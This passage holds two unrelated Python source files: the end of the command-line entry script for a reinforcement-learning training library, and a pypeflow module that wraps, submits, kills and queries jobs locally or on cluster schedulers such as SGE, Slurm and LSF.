specify the port that communicate with training environment of UNITY3D [default: 5005]
-r,--rnn 是否使用RNN模型
whether use rnn[GRU, LSTM, ...] or not [default: False]
-s,--save-frequency=<n> 保存频率
specify the interval that saving model checkpoint [default: None]
-t,--train-step=<n> 总的训练次数
specify the training step that optimize the policy model [default: None]
-u,--unity 是否使用unity客户端
whether training with UNITY3D editor [default: False]
--apex=<str> i.e. "learner"/"worker"/"buffer"/"evaluator" [default: None]
--unity-env=<name> 指定unity环境的名字
specify the name of training environment of UNITY3D [default: None]
--config-file=<file> 指定模型的超参数config文件
specify the path of training configuration file [default: None]
--store-dir=<file> 指定要保存模型、日志、数据的文件夹路径
specify the directory that store model, log and others [default: None]
--seed=<n> 指定训练器全局随机种子
specify the random seed of module random, numpy and tensorflow [default: 42]
--unity-env-seed=<n> 指定unity环境的随机种子
specify the environment random seed of UNITY3D [default: 42]
--max-step=<n> 每回合最大步长
specify the maximum step per episode [default: None]
--train-episode=<n> 总的训练回合数
specify the training maximum episode [default: None]
--train-frame=<n> 总的训练采样次数
specify the training maximum steps interacting with environment [default: None]
--load=<name> 指定载入model的训练名称
specify the name of pre-trained model that need to load [default: None]
--prefill-steps=<n> 指定预填充的经验数量
specify the number of experiences that should be collected before start training, use for off-policy algorithms [default: None]
--prefill-choose 指定no_op操作时随机选择动作,或者置0
whether choose action using model or choose randomly [default: False]
--gym 是否使用gym训练环境
whether training with gym [default: False]
--gym-env=<name> 指定gym环境的名字
specify the environment name of gym [default: CartPole-v0]
--gym-env-seed=<n> 指定gym环境的随机种子
specify the environment random seed of gym [default: 42]
--render-episode=<n> 指定gym环境从何时开始渲染
specify when to render the graphic interface of gym environment [default: None]
--info=<str> 抒写该训练的描述,用双引号包裹
write another information that describe this training task [default: None]
--use-wandb 是否上传数据到W&B
whether upload training log to WandB [default: False]
--hostname 是否在训练名称后附加上主机名称
whether concatenate hostname with the training name [default: False]
--no-save 指定是否在训练中保存模型、日志及训练数据
specify whether save models/logs/summaries while training or not [default: False]
Example:
gym:
python run.py --gym -a dqn --gym-env CartPole-v0 -c 12 -n dqn_cartpole --no-save
unity:
python run.py -u -a ppo -n run_with_unity
python run.py -e /root/env/3dball.app -a sac -n run_with_execution_file
"""
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0, 1"
import sys
if sys.platform.startswith('win'):
import win32api
import win32con
import _thread
def _win_handler(event, hook_sigint=_thread.interrupt_main):
'''
handle the event of 'Ctrl+c' in windows operating system.
'''
if event == 0:
hook_sigint()
return 1
return 0
# Add the _win_handler function to the windows console's handler function list
win32api.SetConsoleCtrlHandler(_win_handler, 1)
import time
import logging
from typing import Dict
from copy import deepcopy
from docopt import docopt
from multiprocessing import Process
from rls.common.trainer import Trainer
from rls.common.config import Config
from rls.common.yaml_ops import load_yaml
from rls.parse.parse_op import parse_options
from rls.utils.display import show_dict
from rls.utils.logging_utils import set_log_level
set_log_level(logging.INFO)
def get_options(options: Dict) -> Config:
'''
Resolves command-line arguments
params:
options: dictionary of command-line arguments
return:
op: an instance of Config class that contains the parameters
'''
def f(k, t): return None if options[k] == 'None' else t(options[k])
op = Config()
op.add_dict(dict([
['inference', bool(options['--inference'])],
['algo', str(options['--algorithm'])],
['use_rnn', bool(options['--rnn'])],
['algo_config', f('--config-file', str)],
['env', f('--env', str)],
['port', int(options['--port'])],
['unity', bool(options['--unity'])],
['graphic', bool(options['--graphic'])],
['name', f('--name', str)],
['save_frequency', f('--save-frequency', int)],
['models', int(options['--models'])],
['store_dir', f('--store-dir', str)],
['seed', int(options['--seed'])],
['unity_env_seed', int(options['--unity-env-seed'])],
['max_step_per_episode', f('--max-step', int)],
['max_train_step', f('--train-step', int)],
['max_train_frame', f('--train-frame', int)],
['max_train_episode', f('--train-episode', int)],
['load', f('--load', str)],
['prefill_steps', f('--prefill-steps', int)],
['prefill_choose', bool(options['--prefill-choose'])],
['gym', bool(options['--gym'])],
['n_copys', int(options['--copys'])],
['gym_env', str(options['--gym-env'])],
['gym_env_seed', int(options['--gym-env-seed'])],
['render_episode', f('--render-episode', int)],
['info', f('--info', str)],
['use_wandb', bool(options['--use-wandb'])],
['unity_env', f('--unity-env', str)],
['apex', f('--apex', str)],
['hostname', bool(options['--hostname'])],
['no_save', bool(options['--no-save'])]
]))
return op
def agent_run(*args):
'''
Start a training task
'''
Trainer(*args)()
def main():
options = docopt(__doc__)
options = get_options(dict(options))
show_dict(options.to_dict)
trails = options.models
assert trails > 0, '--models must greater than 0.'
env_args, buffer_args, train_args = parse_options(options, default_config=load_yaml(f'./config.yaml'))
if options.inference:
Trainer(env_args, buffer_args, train_args).evaluate()
return
if options.apex is not None:
train_args.update(load_yaml(f'./rls/distribute/apex/config.yaml'))
Trainer(env_args, buffer_args, train_args).apex()
else:
if trails == 1:
agent_run(env_args, buffer_args, train_args)
elif trails > 1:
processes = []
for i in range(trails):
_env_args, _buffer_args, _train_args = map(deepcopy, [env_args, buffer_args, train_args])
_train_args.seed += i * 10
_train_args.name += f'/{i}'
_train_args.allow_print = True # NOTE: set this could block other processes' print function
if _env_args.type == 'unity':
_env_args.port = env_args.port + i
p = Process(target=agent_run, args=(_env_args, _buffer_args, _train_args))
p.start()
time.sleep(10)
processes.append(p)
[p.join() for p in processes]
if __name__ == "__main__":
try:
import colored_traceback
colored_traceback.add_hook()
except ImportError:
pass
try:
main()
except Exception as e:
print(e)
sys.exit()
|
fs_based.py
|
#! python2.7
"""Filesytem-based process-watcher.
This is meant to be part of a 2-process system. For now, let's call these processes the Definer and the Watcher.
* The Definer creates a graph of tasks and starts a resolver loop, like pypeflow. It keeps a Waiting list, a Running list, and a Done list. It then communicates with the Watcher.
* The Watcher has 3 basic functions in its API.
1. Spawn jobs.
2. Kill jobs.
3. Query jobs.
1. Spawning jobs
The job definition includes the script, how to run it (locally, qsub, etc.), and maybe some details (unique-id, run-directory). The Watcher then:
* wraps the script without something to update a heartbeat-file periodically,
* spawns each job (possibly as a background process locally),
* and records info (including PID or qsub-name) in a persistent database.
2. Kill jobs.
Since it has a persistent database, it can always kill any job, upon request.
3. Query jobs.
Whenever requested, it can poll the filesystem for all or any jobs, returning the subset of completed jobs. (For NFS efficiency, all the job-exit sentinel files can be in the same directory, along with the heartbeats.)
The Definer would call the Watcher to spawn tasks, and then periodically to poll them. Because these are both now single-threaded, the Watcher *could* be a function within the Definer, or a it could be blocking call to a separate process. With proper locking on the database, users could also query the same executable as a separate process.
Caching/timestamp-checking would be done in the Definer, flexibly specific to each Task.
Eventually, the Watcher could be in a different programming language. Maybe perl. (In bash, a background heartbeat gets is own process group, so it can be hard to clean up.)
"""
from __future__ import print_function
try:
from shlex import quote
except ImportError:
from pipes import quote
import collections
import contextlib
import copy
import glob
import json
import logging
import os
import pprint
import re
import signal
import string
import subprocess
import sys
import time
import traceback
from pypeflow.io import capture, syscall
log = logging.getLogger(__name__)
HEARTBEAT_RATE_S = 10.0
ALLOWED_SKEW_S = 120.0
STATE_FN = 'state.py'
Job = collections.namedtuple('Job', ['jobid', 'cmd', 'rundir', 'options'])
MetaJob = collections.namedtuple('MetaJob', ['job', 'lang_exe'])
lang_python_exe = sys.executable
lang_bash_exe = '/bin/bash'
@contextlib.contextmanager
def cd(newdir):
prevdir = os.getcwd()
log.debug('CD: %r <- %r' %(newdir, prevdir))
os.chdir(os.path.expanduser(newdir))
try:
yield
finally:
log.debug('CD: %r -> %r' %(newdir, prevdir))
os.chdir(prevdir)
class MetaJobClass(object):
ext = {
lang_python_exe: '.py',
lang_bash_exe: '.bash',
}
def get_wrapper(self):
return 'run-%s%s' %(self.mj.job.jobid, self.ext[self.mj.lang_exe])
def get_sentinel(self):
return 'exit-%s' %self.mj.job.jobid # in watched dir
def get_heartbeat(self):
return 'heartbeat-%s' %self.mj.job.jobid # in watched dir
def get_pid(self):
return self.mj.pid
def kill(self, pid, sig):
stored_pid = self.get_pid()
if not pid:
pid = stored_pid
log.info('Not passed a pid to kill. Using stored pid:%s' %pid)
if pid and stored_pid:
if pid != stored_pid:
log.error('pid:%s != stored_pid:%s' %(pid, stored_pid))
os.kill(pid, sig)
def __init__(self, mj):
self.mj = mj
class State(object):
def get_state_fn(self):
return os.path.join(self.__directory, STATE_FN)
def get_directory(self):
return self.__directory
def get_directory_wrappers(self):
return os.path.join(self.__directory, 'wrappers')
def get_directory_heartbeats(self):
return os.path.join(self.__directory, 'heartbeats')
def get_directory_exits(self):
return os.path.join(self.__directory, 'exits')
def get_directory_jobs(self):
# B/c the other directories can get big, we put most per-job data here, under each jobid.
return os.path.join(self.__directory, 'jobs')
def get_directory_job(self, jobid):
return os.path.join(self.get_directory_jobs(), jobid)
def submit_background(self, bjob):
"""Run job in background.
Record in state.
"""
self.top['jobs'][bjob.mjob.job.jobid] = bjob
jobid = bjob.mjob.job.jobid
mji = MetaJobClass(bjob.mjob)
script_fn = os.path.join(self.get_directory_wrappers(), mji.get_wrapper())
exe = bjob.mjob.lang_exe
run_dir = self.get_directory_job(jobid)
makedirs(run_dir)
with cd(run_dir):
bjob.submit(self, exe, script_fn) # Can raise
log.info('Submitted backgroundjob=%s'%repr(bjob))
self.top['jobids_submitted'].append(jobid)
def get_mji(self, jobid):
mjob = self.top['jobs'][jobid].mjob
return MetaJobClass(mjob)
def get_bjob(self, jobid):
return self.top['jobs'][jobid]
def get_bjobs(self):
return self.top['jobs']
def get_mjobs(self):
return {jobid: bjob.mjob for jobid, bjob in self.top['jobs'].iteritems()}
def add_deleted_jobid(self, jobid):
self.top['jobids_deleted'].append(jobid)
def serialize(self):
return pprint.pformat(self.top)
@staticmethod
def deserialize(directory, content):
state = State(directory)
state.top = eval(content)
state.content_prev = content
return state
@staticmethod
def create(directory):
state = State(directory)
makedirs(state.get_directory_wrappers())
makedirs(state.get_directory_heartbeats())
makedirs(state.get_directory_exits())
#system('lfs setstripe -c 1 {}'.format(state.get_directory_heartbeats())) # no improvement noticed
makedirs(state.get_directory_jobs())
return state
def __init__(self, directory):
self.__directory = os.path.abspath(directory)
self.content_prev = ''
self.top = dict()
self.top['jobs'] = dict()
self.top['jobids_deleted'] = list()
self.top['jobids_submitted'] = list()
def get_state(directory):
state_fn = os.path.join(directory, STATE_FN)
if not os.path.exists(state_fn):
return State.create(directory)
try:
return State.deserialize(directory, open(state_fn).read())
except Exception:
log.exception('Failed to read state "%s". Ignoring (and soon over-writing) current state.'%state_fn)
# TODO: Backup previous STATE_FN?
return State(directory)
def State_save(state):
# TODO: RW Locks, maybe for runtime of whole program.
content = state.serialize()
content_prev = state.content_prev
if content == content_prev:
return
fn = state.get_state_fn()
open(fn, 'w').write(content)
log.debug('saved state to %s' %repr(os.path.abspath(fn)))
def Job_get_MetaJob(job, lang_exe=lang_bash_exe):
return MetaJob(job, lang_exe=lang_exe)
def MetaJob_wrap(mjob, state):
"""Write wrapper contents to mjob.wrapper.
"""
wdir = state.get_directory_wrappers()
hdir = state.get_directory_heartbeats()
edir = state.get_directory_exits()
metajob_rundir = mjob.job.rundir
bash_template = """#!%(lang_exe)s
printenv
echo
set -x
%(cmd)s
"""
# We do not bother with 'set -e' here because this script is run either
# in the background or via qsub.
templates = {
lang_python_exe: python_template,
lang_bash_exe: bash_template,
}
mji = MetaJobClass(mjob)
wrapper_fn = os.path.join(wdir, mji.get_wrapper())
exit_sentinel_fn=os.path.join(edir, mji.get_sentinel())
heartbeat_fn=os.path.join(hdir, mji.get_heartbeat())
rate = HEARTBEAT_RATE_S
command = mjob.job.cmd
prog = 'heartbeat-wrapper' # missing in mobs
prog = 'python2.7 -m pwatcher.mains.fs_heartbeat'
heartbeat_wrapper_template = "{prog} --directory={metajob_rundir} --heartbeat-file={heartbeat_fn} --exit-file={exit_sentinel_fn} --rate={rate} {command} || echo 99 >| {exit_sentinel_fn}"
# We write 99 into exit-sentinel if the wrapper fails.
wrapped = heartbeat_wrapper_template.format(**locals())
log.debug('Wrapped "%s"' %wrapped)
wrapped = templates[mjob.lang_exe] %dict(
lang_exe=mjob.lang_exe,
cmd=wrapped,
)
log.debug('Writing wrapper "%s"' %wrapper_fn)
open(wrapper_fn, 'w').write(wrapped)
def background(script, exe='/bin/bash'):
"""Start script in background (so it keeps going when we exit).
Run in cwd.
For now, stdout/stderr are captured.
Return pid.
"""
args = [exe, script]
sin = open(os.devnull)
sout = open('stdout', 'w')
serr = open('stderr', 'w')
pseudo_call = '{exe} {script} 1>|stdout 2>|stderr & '.format(exe=exe, script=script)
log.info('dir: {!r}\nCALL:\n {!r}'.format(os.getcwd(), pseudo_call))
proc = subprocess.Popen([exe, script], stdin=sin, stdout=sout, stderr=serr)
pid = proc.pid
log.info('pid=%s pgid=%s sub-pid=%s' %(os.getpid(), os.getpgid(0), proc.pid))
#checkcall = 'ls -l /proc/{}/cwd'.format(
# proc.pid)
#system(checkcall, checked=True)
return pid
def qstripped(option, flag='-q'):
"""Given a string of options, remove any -q foo.
(No longer used.)
>>> qstripped('-xy -q foo -z bar')
'-xy -z bar'
>>> qstripped('-xy -p foo -z bar', '-p')
'-xy -z bar'
"""
# For now, do not strip -qfoo
vals = option.strip().split()
while flag in vals:
i = vals.index(flag)
vals = vals[0:i] + vals[i+2:]
return ' '.join(vals)
class MetaJobLocal(object):
"""For jobs on the local machine, with process-watching.
We cannot simply run with '&' because then we would not know how
to kill the new background job.
"""
def submit(self, state, exe, script_fn):
"""Can raise.
"""
pid = background(script_fn, exe=self.mjob.lang_exe)
def kill(self, state, heartbeat):
"""Can raise.
(Actually, we could derive heartbeat from state. But for now, we know it anyway.)
"""
hdir = state.get_directory_heartbeats()
heartbeat_fn = os.path.join(hdir, heartbeat)
with open(heartbeat_fn) as ifs:
line = ifs.readline()
pid = line.split()[1]
pid = int(pid)
pgid = line.split()[2]
pgid = int(pgid)
sig =signal.SIGKILL
log.info('Sending signal(%s) to pgid=-%s (pid=%s) based on heartbeat=%r' %(sig, pgid, pid, heartbeat))
try:
os.kill(-pgid, sig)
except Exception:
log.exception('Failed to kill(%s) pgid=-%s for %r. Trying pid=%s' %(sig, pgid, heartbeat_fn, pid))
os.kill(pid, sig)
def __repr__(self):
return 'MetaJobLocal(%s)' %repr(self.mjob)
def __init__(self, mjob):
self.mjob = mjob # PUBLIC
class MetaJobSubmit(object):
"""Generic job-submission, non-blocking.
Add shebang to script.
If running locally, then caller must append '&' onto job_submit to put job in background.
"""
def submit(self, state, exe, script_fn):
"""Run in cwd, in background.
Can raise.
"""
run_dir = os.getcwd()
job_name = self.get_job_name()
#job_nproc = self.job_nproc
#job_mb = self.job_mb
#job_queue = self.job_queue
# Add shebang, in case shell_start_mode=unix_behavior (for SGE).
# https://github.com/PacificBiosciences/FALCON/pull/348
with open(script_fn, 'r') as original: data = original.read()
with open(script_fn, 'w') as modified: modified.write("#!/bin/bash" + "\n" + data)
mapping = dict(
JOB_EXE='/bin/bash',
JOB_NAME=job_name,
#JOB_OPTS=JOB_OPTS,
#JOB_QUEUE=job_queue,
JOB_SCRIPT=script_fn, CMD=script_fn,
JOB_DIR=run_dir, DIR=run_dir,
JOB_STDOUT='stdout', STDOUT_FILE='stdout',
JOB_STDERR='stderr', STDERR_FILE='stderr',
#MB=pypeflow_mb,
#NPROC=pypeflow_nproc,
)
mapping.update(self.job_dict)
if 'JOB_OPTS' in mapping:
# a special two-level mapping: ${JOB_OPTS} is substituted first
mapping['JOB_OPTS'] = self.sub(mapping['JOB_OPTS'], mapping)
sge_cmd = self.sub(self.submit_template, mapping)
self.submit_capture = capture(sge_cmd)
def kill(self, state, heartbeat=None):
"""Can raise.
"""
#hdir = state.get_directory_heartbeats()
#heartbeat_fn = os.path.join(hdir, heartbeat)
#jobid = self.mjob.job.jobid
job_name = self.get_job_name()
job_num = self.get_job_num()
mapping = dict(
JOB_NAME=job_name,
JOB_NUM=job_name,
)
mapping.update(self.job_dict)
sge_cmd = self.sub(self.kill_template, mapping)
system(sge_cmd, checked=False)
def sub(self, unsub, mapping):
return string.Template(unsub).substitute(mapping)
def get_job_name(self):
"""Some systems are limited to 15 characters, but we expect that to be truncated by the caller.
TODO: Choose a sequential jobname and record it. Priority: low, since collisions are very unlikely.
"""
# jobid is an overloaded term in the pbsmrtpipe world, so we use job_name here.
return self.mjob.job.jobid
def get_job_num(self):
"""For now, just the jobname.
"""
return self.mjob.job.jobid
def __repr__(self):
return '{}({!r})'.format(self.__class__.__name__, self.mjob)
def __init__(self, mjob):
self.mjob = mjob
if not hasattr(self, 'JOB_OPTS'):
self.JOB_OPTS = None # unreachable, since this is an abstract class
self.job_dict = copy.deepcopy(self.mjob.job.options)
jd = self.job_dict
if 'submit' in jd:
self.submit_template = jd['submit']
if 'kill' in jd:
self.kill_template = jd['kill']
if 'JOB_OPTS' not in jd and hasattr(self, 'JOB_OPTS'):
jd['JOB_OPTS'] = self.JOB_OPTS
assert self.submit_template
assert self.kill_template
assert self.JOB_OPTS
class MetaJobSge(MetaJobSubmit):
def __init__(self, mjob):
# '-V' => pass enV; '-j y' => combine out/err
self.submit_template = 'qsub -V -N ${JOB_NAME} ${JOB_OPTS} -cwd -o ${JOB_STDOUT} -e ${JOB_STDERR} -S /bin/bash ${JOB_SCRIPT}'
self.JOB_OPTS = '-q ${JOB_QUEUE} -pe smp ${NPROC}' # -l h_vmem=${MB}M does not work within PacBio
self.kill_template = 'qdel ${JOB_NAME}'
super(MetaJobSge, self).__init__(mjob)
class MetaJobPbs(MetaJobSubmit):
"""
usage: qsub [-a date_time] [-A account_string] [-c interval]
[-C directive_prefix] [-e path] [-h ] [-I [-X]] [-j oe|eo] [-J X-Y[:Z]]
[-k o|e|oe] [-l resource_list] [-m mail_options] [-M user_list]
[-N jobname] [-o path] [-p priority] [-q queue] [-r y|n]
[-S path] [-u user_list] [-W otherattributes=value...]
[-v variable_list] [-V ] [-z] [script | -- command [arg1 ...]]
"""
def get_job_num(self):
"""Really an Id, not a number, but JOB_ID was used for something else.
See: https://github.com/PacificBiosciences/pypeFLOW/issues/54
"""
cap = self.submit_capture
try:
re_cap = re.compile(r'\S+')
mo = re_cap.search(cap)
return mo.group(0)
except Exception:
log.exception('For PBS, failed to parse submit_capture={!r}\n Using job_name instead.'.format(cap))
return self.mjob.job.jobid
def __init__(self, mjob):
self.submit_template = 'qsub -V -N ${JOB_NAME} ${JOB_OPTS} -o ${JOB_STDOUT} -e ${JOB_STDERR} -S /bin/bash ${JOB_SCRIPT}'
self.JOB_OPTS = '-q ${JOB_QUEUE} --cpus-per-task=${NPROC} --mem-per-cpu=${MB}M'
self.kill_template = 'qdel ${JOB_NAME}'
super(MetaJobPbs, self).__init__(mjob)
class MetaJobTorque(MetaJobSubmit):
# http://docs.adaptivecomputing.com/torque/4-0-2/help.htm#topics/commands/qsub.htm
def __init__(self, mjob):
self.submit_template = 'qsub -V -N ${JOB_NAME} ${JOB_OPTS} -d ${JOB_DIR} -o ${JOB_STDOUT} -e ${JOB_STDERR} -S /bin/bash ${JOB_SCRIPT}'
self.JOB_OPTS = '-q ${JOB_QUEUE} -l procs=${NPROC}'
self.kill_template = 'qdel ${JOB_NUM}'
super(MetaJobTorque, self).__init__(mjob)
class MetaJobSlurm(MetaJobSubmit):
def __init__(self, mjob):
self.submit_template = 'sbatch -J ${JOB_NAME} ${JOB_OPTS} -D ${JOB_DIR} -o ${JOB_STDOUT} -e ${JOB_STDERR} --wrap="/bin/bash ${JOB_SCRIPT}"'
self.JOB_OPTS = '-p ${JOB_QUEUE} --mincpus=${NPROC} --mem-per-cpu=${MB}'
self.kill_template = 'scancel -n ${JOB_NUM}'
super(MetaJobSlurm, self).__init__(mjob)
class MetaJobLsf(MetaJobSubmit):
def __init__(self, mjob):
self.submit_template = 'bsub -J ${JOB_NAME} ${JOB_OPTS} -o ${JOB_STDOUT} -e ${JOB_STDERR} "/bin/bash ${JOB_SCRIPT}"'
# "Sets the user's execution environment for the job, including the current working directory, file creation mask, and all environment variables, and sets LSF environment variables before starting the job."
self.JOB_OPTS = '-q ${JOB_QUEUE} -n ${NPROC}'
self.kill_template = 'bkill -J ${JOB_NUM}'
super(MetaJobLsf, self).__init__(mjob)
def link_rundir(state_rundir, user_rundir):
if user_rundir:
link_fn = os.path.join(user_rundir, 'pwatcher.dir')
if os.path.lexists(link_fn):
os.unlink(link_fn)
os.symlink(os.path.abspath(state_rundir), link_fn)
def cmd_run(state, jobids, job_type, job_defaults_dict):
"""On stdin, each line is a unique job-id, followed by run-dir, followed by command+args.
Wrap them and run them locally, in the background.
"""
# We don't really need job_defaults_dict as they were already
# added to job_dict for each job.
jobs = dict()
submitted = list()
result = {'submitted': submitted}
for jobid, desc in jobids.iteritems():
options = copy.deepcopy(desc['job_dict']) # defaults were already applied here
if not options.get('job_type'):
options['job_type'] = job_type
if int(desc['job_local']):
options['job_type'] = 'local'
jobs[jobid] = Job(jobid, desc['cmd'], desc['rundir'], options)
log.debug('jobs:\n{}'.format(pprint.pformat(jobs)))
for jobid, job in jobs.iteritems():
desc = jobids[jobid]
mjob = Job_get_MetaJob(job)
MetaJob_wrap(mjob, state)
options = job.options
my_job_type = job.options['job_type']
if my_job_type is None:
my_job_type = job_type
my_job_type = my_job_type.upper()
log.info(' starting job {} w/ job_type={}'.format(pprint.pformat(job), my_job_type))
if my_job_type == 'LOCAL':
bjob = MetaJobLocal(mjob)
elif my_job_type == 'SGE':
bjob = MetaJobSge(mjob)
elif my_job_type == 'PBS':
bjob = MetaJobPbs(mjob)
elif my_job_type == 'TORQUE':
bjob = MetaJobTorque(mjob)
elif my_job_type == 'SLURM':
bjob = MetaJobSlurm(mjob)
elif my_job_type == 'LSF':
bjob = MetaJobLsf(mjob)
else:
raise Exception('Unknown my_job_type=%s' %repr(my_job_type))
try:
link_rundir(state.get_directory_job(jobid), desc.get('rundir'))
state.submit_background(bjob)
submitted.append(jobid)
except Exception:
log.exception('In pwatcher.fs_based.cmd_run(), failed to submit background-job:\n{!r}'.format(
bjob))
#raise
return result
# The caller is responsible for deciding what to do about job-submission failures. Re-try, maybe?
re_heartbeat = re.compile(r'heartbeat-(.+)')
def get_jobid_for_heartbeat(heartbeat):
"""This cannot fail unless we change the filename format.
"""
mo = re_heartbeat.search(heartbeat)
jobid = mo.group(1)
return jobid
def system(call, checked=False):
log.info('CALL:\n {}'.format(call))
rc = os.system(call)
if checked and rc:
raise Exception('{} <- {!r}'.format(rc, call))
_warned = dict()
def warnonce(hashkey, msg):
if hashkey in _warned:
return
log.warning(msg)
_warned[hashkey] = True
def get_status(state, elistdir, reference_s, sentinel, heartbeat):
heartbeat_path = os.path.join(state.get_directory_heartbeats(), heartbeat)
# We take listdir so we can avoid extra system calls.
if sentinel in elistdir:
try:
pass
#os.remove(heartbeat_path) # Note: We no longer use the heartbeats.
except Exception:
log.debug('Unable to remove heartbeat {} when sentinel was found in exit-sentinels listdir.\n{}'.format(
repr(heartbeat_path), traceback.format_exc()))
sentinel_path = os.path.join(state.get_directory_exits(), sentinel)
with open(sentinel_path) as ifs:
rc = ifs.read().strip()
return 'EXIT {}'.format(rc)
## TODO: Record last stat times, to avoid extra stat if too frequent.
#try:
# mtime_s = os.path.getmtime(heartbeat_path)
# if (mtime_s + 3*HEARTBEAT_RATE_S) < reference_s:
# if (ALLOWED_SKEW_S + mtime_s + 3*HEARTBEAT_RATE_S) < reference_s:
# msg = 'DEAD job? {} + 3*{} + {} < {} for {!r}'.format(
# mtime_s, HEARTBEAT_RATE_S, ALLOWED_SKEW_S, reference_s, heartbeat_path)
# log.debug(msg)
# warnonce(heartbeat_path, msg)
# return 'DEAD'
# else:
# log.debug('{} + 3*{} < {} for {!r}. You might have a large clock-skew, or filesystem delays, or just filesystem time-rounding.'.format(
# mtime_s, HEARTBEAT_RATE_S, reference_s, heartbeat_path))
#except Exception as exc:
# # Probably, somebody deleted it after our call to os.listdir().
# # TODO: Decide what this really means.
# log.debug('Heartbeat not (yet?) found at %r: %r' %(heartbeat_path, exc))
# return 'UNKNOWN'
return 'RUNNING' # but actually it might not have started yet, or it could be dead, since we are not checking the heartbeat
def cmd_query(state, which, jobids):
"""Return the state of named jobids.
See find_jobids().
"""
found = dict()
edir = state.get_directory_exits()
for heartbeat in find_heartbeats(state, which, jobids):
jobid = get_jobid_for_heartbeat(heartbeat)
mji = state.get_mji(jobid)
sentinel = mji.get_sentinel()
#system('ls -l {}/{} {}/{}'.format(edir, sentinel, hdir, heartbeat), checked=False)
found[jobid] = (sentinel, heartbeat)
elistdir = os.listdir(edir)
current_time_s = time.time()
result = dict()
jobstats = dict()
result['jobids'] = jobstats
for jobid, pair in found.iteritems():
sentinel, heartbeat = pair
status = get_status(state, elistdir, current_time_s, sentinel, heartbeat)
log.debug('Status %s for heartbeat:%s' %(status, heartbeat))
jobstats[jobid] = status
return result
def get_jobid2pid(pid2mjob):
result = dict()
for pid, mjob in pid2mjob.iteritems():
jobid = mjob.job.jobid
result[jobid] = pid
return result
def find_heartbeats(state, which, jobids):
"""Yield heartbeat filenames.
If which=='list', then query jobs listed as jobids.
If which=='known', then query all known jobs.
If which=='infer', then query all jobs with heartbeats.
These are not quite finished, but already useful.
"""
#log.debug('find_heartbeats for which=%s, jobids=%s' %(which, pprint.pformat(jobids)))
if which == 'infer':
for fn in glob.glob(os.path.join(state.get_directory_heartbeats(), 'heartbeat*')):
yield fn
elif which == 'known':
jobid2mjob = state.get_mjobs()
for jobid, mjob in jobid2mjob.iteritems():
mji = MetaJobClass(mjob)
yield mji.get_heartbeat()
elif which == 'list':
jobid2mjob = state.get_mjobs()
#log.debug('jobid2mjob:\n%s' %pprint.pformat(jobid2mjob))
for jobid in jobids:
#log.debug('jobid=%s; jobids=%s' %(repr(jobid), repr(jobids)))
#if jobid not in jobid2mjob:
# log.info("jobid=%s is not known. Might have been deleted already." %jobid)
mjob = jobid2mjob[jobid]
mji = MetaJobClass(mjob)
yield mji.get_heartbeat()
else:
raise Exception('which=%s'%repr(which))
def delete_heartbeat(state, heartbeat, keep=False):
"""
Kill the job with this heartbeat.
(If there is no heartbeat, then the job is already gone.)
Delete the entry from state and update its jobid.
Remove the heartbeat file, unless 'keep'.
"""
hdir = state.get_directory_heartbeats()
heartbeat_fn = os.path.join(hdir, heartbeat)
jobid = get_jobid_for_heartbeat(heartbeat)
try:
bjob = state.get_bjob(jobid)
except Exception:
log.exception('In delete_heartbeat(), unable to find batchjob for %s (from %s)' %(jobid, heartbeat))
log.warning('Cannot delete. You might be able to delete this yourself if you examine the content of %s.' %heartbeat_fn)
# TODO: Maybe provide a default grid type, so we can attempt to delete anyway?
return
try:
bjob.kill(state, heartbeat)
except Exception as exc:
log.exception('Failed to kill job for heartbeat {!r} (which might mean it was already gone): {!r}'.format(
heartbeat, exc))
state.add_deleted_jobid(jobid)
# For now, keep it in the 'jobs' table.
try:
os.remove(heartbeat_fn)
log.debug('Removed heartbeat=%s' %repr(heartbeat))
except OSError as exc:
log.debug('Cannot remove heartbeat {!r}: {!r}'.format(heartbeat_fn, exc))
# Note: If sentinel suddenly appeared, that means the job exited. The pwatcher might wrongly think
# it was deleted, but its output might be available anyway.
def cmd_delete(state, which, jobids):
"""Kill designated jobs, including (hopefully) their
entire process groups.
If which=='list', then kill all jobs listed as jobids.
If which=='known', then kill all known jobs.
If which=='infer', then kill all jobs with heartbeats.
Remove those heartbeat files.
"""
log.debug('Deleting jobs for jobids from %s (%s)' %(
which, repr(jobids)))
for heartbeat in find_heartbeats(state, which, jobids):
delete_heartbeat(state, heartbeat)
def makedirs(path):
if not os.path.isdir(path):
os.makedirs(path)
def readjson(ifs):
"""Del keys that start with ~.
That lets us have trailing commas on all other lines.
"""
content = ifs.read()
log.debug('content:%s' %repr(content))
jsonval = json.loads(content)
#pprint.pprint(jsonval)
def striptildes(subd):
if not isinstance(subd, dict):
return
for k,v in subd.items():
if k.startswith('~'):
del subd[k]
else:
striptildes(v)
striptildes(jsonval)
#pprint.pprint(jsonval)
return jsonval
class ProcessWatcher(object):
def run(self, jobids, job_type, job_defaults_dict):
#import traceback; log.debug(''.join(traceback.format_stack()))
log.debug('run(jobids={}, job_type={}, job_defaults_dict={})'.format(
'<%s>'%len(jobids), job_type, job_defaults_dict))
return cmd_run(self.state, jobids, job_type, job_defaults_dict)
def query(self, which='list', jobids=[]):
log.debug('query(which={!r}, jobids={})'.format(
which, '<%s>'%len(jobids)))
return cmd_query(self.state, which, jobids)
def delete(self, which='list', jobids=[]):
log.debug('delete(which={!r}, jobids={})'.format(
which, '<%s>'%len(jobids)))
return cmd_delete(self.state, which, jobids)
def __init__(self, state):
self.state = state
def get_process_watcher(directory):
state = get_state(directory)
#log.debug('state =\n%s' %pprint.pformat(state.top))
return ProcessWatcher(state)
#State_save(state)
@contextlib.contextmanager
def process_watcher(directory):
"""This will (someday) hold a lock, so that
the State can be written safely at the end.
"""
state = get_state(directory)
#log.debug('state =\n%s' %pprint.pformat(state.top))
yield ProcessWatcher(state)
# TODO: Sometimes, maybe we should not save state.
# Or maybe we *should* on exception.
State_save(state)
def main(prog, cmd, state_dir='mainpwatcher', argsfile=None):
logging.basicConfig()
logging.getLogger().setLevel(logging.NOTSET)
log.warning('logging basically configured')
log.debug('debug mode on')
assert cmd in ['run', 'query', 'delete']
ifs = sys.stdin if not argsfile else open(argsfile)
argsdict = readjson(ifs)
log.info('argsdict =\n%s' %pprint.pformat(argsdict))
with process_watcher(state_dir) as watcher:
result = getattr(watcher, cmd)(**argsdict)
if result is not None:
print(pprint.pformat(result))
# With bash, we would need to set the session, rather than
# the process group. That's not ideal, but this is here for reference.
# http://stackoverflow.com/questions/6549663/how-to-set-process-group-of-a-shell-script
#
bash_template = """#!%(lang_exe)s
cmd='%(cmd)s'
"$cmd"
"""
# perl might be better, for efficiency.
# But we will use python for now.
#
